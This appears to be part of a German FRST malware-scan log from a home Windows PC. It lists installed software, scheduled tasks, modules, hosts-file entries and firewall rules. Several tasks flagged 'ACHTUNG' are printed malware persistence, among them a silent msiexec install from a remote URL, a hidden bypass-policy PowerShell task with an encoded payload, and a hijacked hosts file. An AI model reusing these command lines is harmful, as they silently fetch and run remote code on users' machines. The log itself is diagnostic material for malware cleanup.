Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM-x32\...\{D5409B11-EF28-37A1-AE7A-6051A5BAD923}) (Version: 4.5.50932 - Microsoft Corporation)
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.5.1 RC für Windows Store-Apps (Deutsch) (x32 Version: 4.5.21005 - Microsoft Corporation) Hidden
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.5.2 (Deutsch) (HKLM-x32\...\{3F514FDC-F0F2-3B99-86D6-F7B3A2679B39}) (Version: 4.5.51209 - Microsoft Corporation)
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.6 (Deutsch) (HKLM-x32\...\{FACF2669-E25A-428A-9167-5EEDE741F3B9}) (Version: 4.6.00127 - Microsoft Corporation)
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM-x32\...\{4860C1E5-CE58-4D32-89DE-37951333B4C9}) (Version: 4.6.01055 - Microsoft Corporation)
PreEmptive Analytics Client German Language Pack (x32 Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
PreEmptive Analytics Visual Studio Components (x32 Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
Raptr (HKLM-x32\...\Raptr) (Version: 5.2.7-r116720-release - Raptr, Inc)
Roslyn Language Services - x86 (x32 Version: 14.0.25420 - Microsoft Corporation) Hidden
Roslyn Language Services - x86 (x32 Version: 14.0.25424 - Microsoft Corporation) Hidden
Skype™ 7.32 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.32.104 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Team Explorer for Microsoft Visual Studio 2015 Update 3 CTP1 (x32 Version: 14.98.25331 - Microsoft) Hidden
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH)
Test Tools for Microsoft Visual Studio 2015 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
The Binding of Isaac: Rebirth (HKLM\...\Steam App 250900) (Version:  - Nicalis, Inc.)
The Evil Within Demo (HKLM\...\Steam App 329960) (Version:  - Tango Gameworks)
TypeScript Power Tool (x32 Version: 1.8.34.0 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2015 (x32 Version: 1.8.35.0 - Microsoft Corporation) Hidden
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Visual Studio 2015 Update 3 (KB3022398) (HKLM-x32\...\{7a68448b-9cf2-4049-bd73-5875f1aa7ba2}) (Version: 14.0.25420 - Microsoft Corporation)
VS Update core components (x32 Version: 14.0.25424 - Microsoft Corporation) Hidden
vs_update3notification (x32 Version: 14.0.25424 - Microsoft Corporation) Hidden
WCF Data Services 5.6.4 DEU Language Pack (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services 5.6.4 Runtime (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 DEU Language Pack (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
Windows Driver Package - BigNox Corporation (VBoxUSB) USB  (09/16/2015 4.3.12) (HKLM\...\76B144D15273552931249392EDB13C0BBD52C84E) (Version: 09/16/2015 4.3.12 - BigNox Corporation)
Windows Driver Package - BigNox Corporation VBoxUSBMon System  (09/16/2015 4.3.12) (HKLM\...\39F54A37125643D2E1E90FA7D81F36ACC9441510) (Version: 09/16/2015 4.3.12 - BigNox Corporation)
Windows Driver Package - BigNox Corporation XQHDrv System  (09/16/2015 4.3.12) (HKLM\...\0147813640F7AF69F569581EE672B6BE1E71798E) (Version: 09/16/2015 4.3.12 - BigNox Corporation)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {2F6283B0-71C3-4AA7-9709-4F7472913BC9} - System32\Tasks\AMD.PROCC CleanupTemporaryInternetFiles => F:\AMD Pro\AMD.PROCC.CleanupSchedulerTool.exe [2015-03-20] (AMD)
Task: {43282B88-1C88-476F-AFF6-6D1B3573E258} - System32\Tasks\hostTask => C:\ProgramData\PrefsSecure\tree.exe [2017-03-06] ()
Task: {47E9BE80-B4C5-4698-9448-1F90EB42E251} - System32\Tasks\{F98C4DCB-2D2A-4A7E-A676-7BCDC59891DA} => pcalua.exe -a C:\Users\Dominik\AppData\Roaming\Nox\bin\Nox_unload.exe
Task: {49AFA8CB-EE77-44AA-AF71-40ED84B0364E} - System32\Tasks\MiovucyN0s => C:\Program Files (x86)\qF0S2MprXG\updengine.exe  <==== ACHTUNG
Task: {5E0590DE-F480-486F-8557-464B5454B9BF} - \SystemHealer Run Delay -> Keine Datei <==== ACHTUNG
Task: {74EDCA57-F977-4976-B591-F108D62D944E} - System32\Tasks\Avira Browser Safety Updater Task => C:\Program Files (x86)\Avira\Browser Safety\AviraBrowserSafetyUpdater.exe [2015-03-11] (Avira Operations GmbH & Co. KG)
Task: {75D8BC5D-E779-4A82-9631-B041C84909DE} - \SystemHealer Monitor -> Keine Datei <==== ACHTUNG
Task: {78E6D042-ACA0-4832-8639-29000A39ABFF} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-02-18] (Microsoft Corporation)
Task: {7AA18ECC-26BF-4EF9-A4BE-2493782C89B8} - System32\Tasks\AMD.PROCC SleepHibernate Computer => F:\AMD Pro\AMD.PROCC.Notifier.exe [2015-03-20] (AMD)
Task: {7DA4C035-B9B3-4992-8FF2-15615B290A7D} - System32\Tasks\HDWallPaper => C:\Program Files (x86)\HDWallPaper\HDWallPaper.exe  <==== ACHTUNG
Task: {83ABFFED-7A62-4709-BAA9-85ADB7BF660D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-06-26] (Google Inc.)
Task: {8EA83372-A084-4C1D-AA0E-F31077E040E8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-06-26] (Google Inc.)
Task: {9A5BD96E-A5A1-4B44-987C-7737AA1F4D32} - System32\Tasks\AMD.PROCC WakeUp Computer => F:\AMD Pro\AMD.PROCC.Notifier.exe [2015-03-20] (AMD)
Task: {9E87EF18-A7DE-49C0-8B64-53354AA6F47F} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => F:\Program Files\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe [2016-06-20] (Microsoft Corporation)
Task: {A2B32D2A-9725-45E7-AC83-20CF961B0284} - System32\Tasks\PPI Update => C:\Windows\explorer.exe "hxxp://insightcdn.online/download/index.php?mn=9995" <==== ACHTUNG
Task: {A9D9E725-CAEB-40E0-8627-ACBB36602E55} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2017-03-06] (Microsoft Corporation)
Task: {AD197D7D-2526-4A27-B82D-88CB9B1074FB} - System32\Tasks\AMD.PROCC CleanupCookies => F:\AMD Pro\AMD.PROCC.CleanupSchedulerTool.exe [2015-03-20] (AMD)
Task: {AF3C537C-2713-4929-8035-93806113E587} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2016-07-18] (Advanced Micro Devices, Inc.)
Task: {B0405A52-E38A-4908-91D7-D6E9812B074B} - System32\Tasks\Ckerctyjolely Server => C:\Program Files (x86)\Voniing\xreudeph.exe 
Task: {C280FEAE-966F-461F-8873-F4FA4D2F5E9D} - System32\Tasks\{1476CE1F-B723-412A-B1E8-B7ABA1D628C5} => pcalua.exe -a "C:\Program Files (x86)\avmwlanstick\instwcli.exe" -d "C:\Program Files (x86)\avmwlanstick" -c -s SwitchStop
Task: {C7A2CA77-EFB7-40BA-8936-8F9326331B03} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-02-18] (Microsoft Corporation)
Task: {CB96A1D5-692A-4B8A-8102-BDA3B6086429} - System32\Tasks\Reosyavasp => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=SanDiskXSDSSDA120G_153482402949&amp;v=201736 /q
Task: {D1BEBA76-9279-4353-8198-28E935AFF8E1} - System32\Tasks\{0A050547-0A0E-797E-0A11-087A0E0E117E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAIAA7ADsAOwAgADsAIAA7ACAAIAA7ACAAOwAgACAAIAAgACAAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIA (Der Dateneintrag hat 9988 mehr Zeichen). <==== ACHTUNG
Task: {D727D958-913E-459D-A8D7-1F8BFC41AE90} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe 
Task: {EFE16CEC-84C5-46FB-8FE8-DBC23BFA2B0D} - \System Healer Task -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-03-06 19:54 - 2017-03-06 19:54 - 00307200 _____ () C:\Program Files (x86)\Ckerctyjolely Server\local64spl.dll
2015-11-13 15:01 - 2015-11-13 15:01 - 00214528 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Container.PerformanceTuning.dll
2014-02-11 05:08 - 2014-02-11 05:08 - 00817152 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Device.dll
2014-02-11 05:08 - 2014-02-11 05:08 - 03650560 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Platform.dll
2015-11-13 15:01 - 2015-11-13 15:01 - 00127488 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2017-03-06 19:56 - 2017-03-06 20:35 - 00043520 _____ () C:\ProgramData\PrefsSecure\Nettrans.exe
2017-03-06 19:56 - 2017-03-06 19:56 - 00470592 _____ () C:\Windows\SysWOW64\NetUtils2016.exe
2017-03-06 19:56 - 2017-03-12 00:49 - 00625272 _____ () C:\Windows\System32\NetUtils2016.dll
2016-05-17 23:42 - 2016-05-17 23:42 - 00230064 _____ () F:\Program Files\Notepad++\NppShell_06.dll
2010-11-22 23:56 - 2010-11-22 23:56 - 00087040 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\_ctypes.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00043008 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\_socket.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00805376 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\_ssl.pyd
2014-05-14 00:26 - 2014-05-14 00:26 - 05812736 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\PyQt4.QtGui.pyd
2014-05-14 00:26 - 2014-05-14 00:26 - 00067584 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\sip.pyd
2014-05-14 00:26 - 2014-05-14 00:26 - 01662464 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\PyQt4.QtCore.pyd
2014-05-14 00:26 - 2014-05-14 00:26 - 00494592 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\PyQt4.QtNetwork.pyd
2010-11-22 23:57 - 2010-11-22 23:57 - 00096256 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\win32api.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00110592 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\pywintypes26.dll
2010-11-22 23:56 - 2010-11-22 23:56 - 00010240 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\select.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00356864 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\_hashlib.pyd
2010-11-22 23:57 - 2010-11-22 23:57 - 00036352 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\win32process.pyd
2010-11-22 23:57 - 2010-11-22 23:57 - 00111104 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\win32file.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00044544 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\_sqlite3.pyd
2011-02-15 19:17 - 2011-02-15 19:17 - 00417501 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\sqlite3.dll
2010-11-22 23:57 - 2010-11-22 23:57 - 00167936 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\win32gui.pyd
2014-05-14 00:26 - 2014-05-14 00:26 - 00313856 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\PyQt4.QtWebKit.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00127488 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\pyexpat.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00009216 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\winsound.pyd
2015-10-21 21:29 - 2015-10-21 21:29 - 00113171 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\libvlc.dll
2015-10-21 21:29 - 2015-10-21 21:29 - 02396691 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\libvlccore.dll
2010-11-22 23:56 - 2010-11-22 23:56 - 00583680 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\unicodedata.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00354304 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\pythoncom26.dll
2010-11-22 23:57 - 2010-11-22 23:57 - 00263168 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\win32com.shell.shell.pyd
2015-06-27 00:09 - 2015-06-27 00:09 - 00271872 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\amd_ags.dll
2010-11-22 23:56 - 2010-11-22 23:56 - 00324608 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\PIL._imaging.pyd
2010-11-22 23:57 - 2010-11-22 23:57 - 00141312 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\gobject._gobject.pyd
2016-04-19 18:08 - 2016-04-19 18:08 - 02717595 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\heliotrope._purple.pyd
2011-02-15 19:17 - 2011-02-15 19:17 - 01213633 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\libxml2-2.dll
2010-11-23 00:06 - 2010-11-23 00:06 - 00055808 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\zlib1.dll
2013-05-10 00:52 - 2013-05-10 00:52 - 00495680 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\plugins\libaim.dll
2013-05-10 00:52 - 2013-05-10 00:52 - 01183699 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\liboscar.dll
2013-05-10 00:52 - 2013-05-10 00:52 - 00483306 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\plugins\libicq.dll
2013-05-03 19:57 - 2013-05-03 19:57 - 00655356 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\plugins\libirc.dll
2013-05-03 19:56 - 2013-05-03 19:56 - 01306387 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\plugins\libmsn.dll
2013-05-03 19:56 - 2013-05-03 19:56 - 00565461 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\plugins\libxmpp.dll
2013-05-03 19:57 - 2013-05-03 19:57 - 01640221 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\libjabber.dll
2013-05-03 19:56 - 2013-05-03 19:56 - 00506276 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\plugins\libyahoo.dll
2013-05-03 19:57 - 2013-05-03 19:57 - 01053730 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\libymsg.dll
2013-05-03 19:57 - 2013-05-03 19:57 - 00497782 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\plugins\libyahoojp.dll
2013-05-03 19:57 - 2013-05-03 19:57 - 00603326 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\plugins\ssl-nss.dll
2013-05-03 19:57 - 2013-05-03 19:57 - 00474199 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\plugins\ssl.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2017-03-06 19:59 - 00008602 ____A C:\Windows\system32\Drivers\etc\hosts

 127.0.0.1       down.baidu2016.com
 127.0.0.1       123.sogou.com
 127.0.0.1       www.czzsyzgm.com
 127.0.0.1       www.czzsyzxl.com
 127.0.0.1       union.baidu2019.com
 127.0.0.1       down.baidu2016.com
 127.0.0.1       123.sogou.com
 127.0.0.1       www.czzsyzgm.com
 127.0.0.1       www.czzsyzxl.com
 127.0.0.1       union.baidu2019.com
 104.131.26.227 469ba60d9681f961064c-3cca6631dac1b4997db921c060b712f6.r30.cf2.rackcdn.com
 104.131.26.227 a.bf-ad.net																
 104.131.26.227 a.visualrevenue.com														
 104.131.26.227 a1.vdna-assets.com														
 104.131.26.227 a248.e.akamai.net														
 104.131.26.227 aax.amazon-adsystem.com													
 104.131.26.227 ad.crwdcntrl.net															
 104.131.26.227 ad.mail.ru																
 104.131.26.227 ade.clmbtech.com															
 104.131.26.227 ads.adfox.ru																
 104.131.26.227 ads.pubmatic.com															
 104.131.26.227 apis.google.com															
 104.131.26.227 asset.pagefair.net														
 104.131.26.227 assets.adobedtm.com														
 104.131.26.227 assets.flocktory.com														
 104.131.26.227 autocontext.begun.ru														
 104.131.26.227 b.grvcdn.com																
 104.131.26.227 b.ns1p.net																
 104.131.26.227 b.scorecardresearch.com													
 104.131.26.227 b.wal.co																	
 104.131.26.227 babator-stg-cdn.babator.com												
 104.131.26.227 beacon.krxd.net															
 104.131.26.227 beacon.walmart.com														
 104.131.26.227 c.amazon-adsystem.com													
 104.131.26.227 c.vepxl1.net																
 104.131.26.227 c2.taboola.com															
 104.131.26.227 cdn.3lift.com															
 104.131.26.227 cdn.admixer.net															
 104.131.26.227 cdn.brcdn.com															
 104.131.26.227 cdn.cxense.com															
 104.131.26.227 cdn.interactivemedia.ne													
 104.131.26.227 cdn.krxd.net																
 104.131.26.227 cdn.lenmit.com															
 104.131.26.227 cdn.livefyre.com															
 104.131.26.227 cdn.m-pathy.com															
 104.131.26.227 cdn.mathjax.org															
 104.131.26.227 cdn.mxpnl.com															
 104.131.26.227 cdn.onthe.io																
 104.131.26.227 cdn.optimizely.com														
 104.131.26.227 cdn.prom.st																
 104.131.26.227 cdn.pushwoosh.com														
 104.131.26.227 cdn.scarabresearch.com													
 104.131.26.227 cdn.taboola.com															
 104.131.26.227 cdn.taplytics.com														
 104.131.26.227 cdn.tt.omtrdc.net														
 104.131.26.227 cdn.unid.go.com															
 104.131.26.227 cdn1.graphiq.com															
 104.131.26.227 cdn3.optimizely.com														
 104.131.26.227 cdnjs.cloudflare.com														
 104.131.26.227 cdnssl.clicktale.net														
 104.131.26.227 comet.yahoo.com															
 104.131.26.227 consent.truste.com														
 104.131.26.227 content.adriver.ru														
 104.131.26.227 contextual.media.net														
 104.131.26.227 cstatic.weborama.fr														
 104.131.26.227 d134l0cdryxgwa.cloudfront.net											
 104.131.26.227 d2oh4tlt9mrke9.cloudfront.net											
 104.131.26.227 dpm.demdex.net															
 104.131.26.227 e.monetate.net															
 104.131.26.227 edge.quantserve.com														
 104.131.26.227 edx-uk.s3ae.com															
 104.131.26.227 eu-services.babator.com													
 104.131.26.227 fc.yahoo.com																
 104.131.26.227 gaua.hit.gemius.pl														
 104.131.26.227 gde-default.hit.gemius.pl												
 104.131.26.227 go.flx1.com																
 104.131.26.227 googleadservices.com														
 104.131.26.227 hpr.outbrain.com															
 104.131.26.227 i.cricketcb.com															
 104.131.26.227 i.tfag.de																
 104.131.26.227 ib.adnxs.com																
 104.131.26.227 imagesrv.adition.com														
 104.131.26.227 img.imgsmail.ru															
 104.131.26.227 img7.auto.ria.com														
 104.131.26.227 j.ophan.co.uk															
 104.131.26.227 js-agent.newrelic.com													
 104.131.26.227 js-sec.indexww.com														
 104.131.26.227 js.revsci.net															
 104.131.26.227 js.ui-portal.de															
 104.131.26.227 kamradamnaradost.ru														
 104.131.26.227 kpmediagaua.hit.gemius.pl												
 104.131.26.227 level1cdn.com															
 104.131.26.227 mc.yandex.ru																
 104.131.26.227 ml314.com																
 104.131.26.227 mtrx.go.sonobi.com														
 104.131.26.227 ninja.onap.io															
 104.131.26.227 o.aolcdn.com																
 104.131.26.227 odb.outbrain.com															
 104.131.26.227 ok-bar.love.mail.ru														

Da befinden sich 59 zusätzliche Einträge.


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-2822580911-2257060262-2848143123-500\Control Panel\Desktop\\Wallpaper -> C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\Bluestacks\HD-Agent.exe
MSCONFIG\startupreg: PlaysTV => "C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv_launcher.exe" --startup
MSCONFIG\startupreg: Raptr => "C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe" --startup
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
MSCONFIG\startupreg: StartCN => "C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe" atlogon

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{DD8C4F30-520D-4B8C-9CAF-9F4BA34EA9CF}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{6C3B2350-47A3-4E43-9F5D-C5204C1D9EAF}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{EB25413A-5E52-46B4-BA0C-6CDFDBB7139E}] => (Allow) F:\Program Files\Steam.exe
FirewallRules: [{161C16FA-E49B-44BA-BD57-DC1DD3AB06AC}] => (Allow) F:\Program Files\Steam.exe
FirewallRules: [{60C14198-9A22-49F3-BBDC-93F7FAB6B231}] => (Allow) F:\Program Files\bin\steamwebhelper.exe
FirewallRules: [{CB638DAB-CF80-4146-AC6A-8F4E9CFE6492}] => (Allow) F:\Program Files\bin\steamwebhelper.exe
FirewallRules: [{EAF5F20D-A729-4577-91F8-FE120E401616}] => (Allow) F:\Program Files\SteamApp\Steam.exe
FirewallRules: [{300564AC-836D-4FD9-BB9C-3066C709272E}] => (Allow) F:\Program Files\SteamApp\Steam.exe
FirewallRules: [{9640BDD3-6935-402B-ADCE-79E9D1E34F2B}] => (Allow) F:\Program Files\SteamApp\bin\steamwebhelper.exe
FirewallRules: [{2CBD5C04-05B3-441F-A02D-569C4638D200}] => (Allow) F:\Program Files\SteamApp\bin\steamwebhelper.exe
FirewallRules: [{E9CD2098-5B59-4BD2-B314-7D1694879B8C}] => (Allow) F:\Program Files\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [TCP Query User{1159E399-DDA3-4612-9DF6-0EB0F631A150}F:\release\release\pogo.necrobot.cli.exe] => (Allow) F:\release\release\pogo.necrobot.cli.exe
FirewallRules: [UDP Query User{4B15EC3A-770A-4AB3-8C53-B3FA326249C1}F:\release\release\pogo.necrobot.cli.exe] => (Allow) F:\release\release\pogo.necrobot.cli.exe
FirewallRules: [TCP Query User{566EAE7F-CA4A-4EDD-AE5E-87CD3C4C1573}F:\pogolocationfeeder-release-v0.0.2.1\pogolocationfeeder.exe] => (Allow) F:\pogolocationfeeder-release-v0.0.2.1\pogolocationfeeder.exe
FirewallRules: [UDP Query User{E3ED22CE-2162-46C7-9F44-E46894F432DF}F:\pogolocationfeeder-release-v0.0.2.1\pogolocationfeeder.exe] => (Allow) F:\pogolocationfeeder-release-v0.0.2.1\pogolocationfeeder.exe
FirewallRules: [TCP Query User{E2F033F5-E806-4E74-9BCF-BEFC52DC7BA3}F:\release (1)\release\pokemobbot.exe] => (Allow) F:\release (1)\release\pokemobbot.exe
FirewallRules: [UDP Query User{E423A029-641A-4579-A6DF-873BBE679B55}F:\release (1)\release\pokemobbot.exe] => (Allow) F:\release (1)\release\pokemobbot.exe
FirewallRules: [TCP Query User{C5652239-4B11-4827-9A87-CC7C5F8C92F9}F:\desktop\release\pokemobbot.exe] => (Allow) F:\desktop\release\pokemobbot.exe
FirewallRules: [UDP Query User{249814FC-CC2C-4022-B0DC-910985F89354}F:\desktop\release\pokemobbot.exe] => (Allow) F:\desktop\release\pokemobbot.exe
FirewallRules: [TCP Query User{C798173C-CF44-4AFB-856F-37839F57EAD4}F:\release (2)\necrobot.exe] => (Allow) F:\release (2)\necrobot.exe
FirewallRules: [UDP Query User{CC35C4D5-9145-4E12-BD35-DB0FBFE1B66C}F:\release (2)\necrobot.exe] => (Allow) F:\release (2)\necrobot.exe
FirewallRules: [TCP Query User{29E8515B-F4CA-4162-81C9-542E4018DD0B}F:\release (2) - kopie\necrobot.exe] => (Allow) F:\release (2) - kopie\necrobot.exe
FirewallRules: [UDP Query User{E3D9E661-7560-48BF-8452-0513872E97E4}F:\release (2) - kopie\necrobot.exe] => (Allow) F:\release (2) - kopie\necrobot.exe
FirewallRules: [{4E5C32A1-88E0-415B-9947-BC9A4292DBAC}] => (Allow) C:\Users\Dominik\AppData\Roaming\Nox\bin\Nox.exe
FirewallRules: [{03558CBE-8EAE-45A6-BDC3-7D92708EF634}] => (Allow) C:\Program Files\Bignox\BigNoxVM\RTNoxVMHandle.exe
FirewallRules: [TCP Query User{D884656D-DBBB-4875-BFDE-1AA90F5F627B}F:\gba emu\vbalink180b0\visualboyadvance.exe] => (Allow) F:\gba emu\vbalink180b0\visualboyadvance.exe
FirewallRules: [UDP Query User{C44BAD95-538D-4C11-A1D0-877AB2E4E0FC}F:\gba emu\vbalink180b0\visualboyadvance.exe] => (Allow) F:\gba emu\vbalink180b0\visualboyadvance.exe
FirewallRules: [TCP Query User{2DC4347F-F085-4010-A128-0D3948AD55F8}F:\gba emu\vbalink180b0 - kopie\visualboyadvance.exe] => (Allow) F:\gba emu\vbalink180b0 - kopie\visualboyadvance.exe
FirewallRules: [UDP Query User{D8563C77-DBBE-4529-8B54-EAC13B9A94AB}F:\gba emu\vbalink180b0 - kopie\visualboyadvance.exe] => (Allow) F:\gba emu\vbalink180b0 - kopie\visualboyadvance.exe
FirewallRules: [{57CBCD6E-01EE-4030-BBDC-B215FF81639B}] => (Allow) F:\Program Files\SteamApp\bin\cef\cef.win7\steamwebhelper.exe
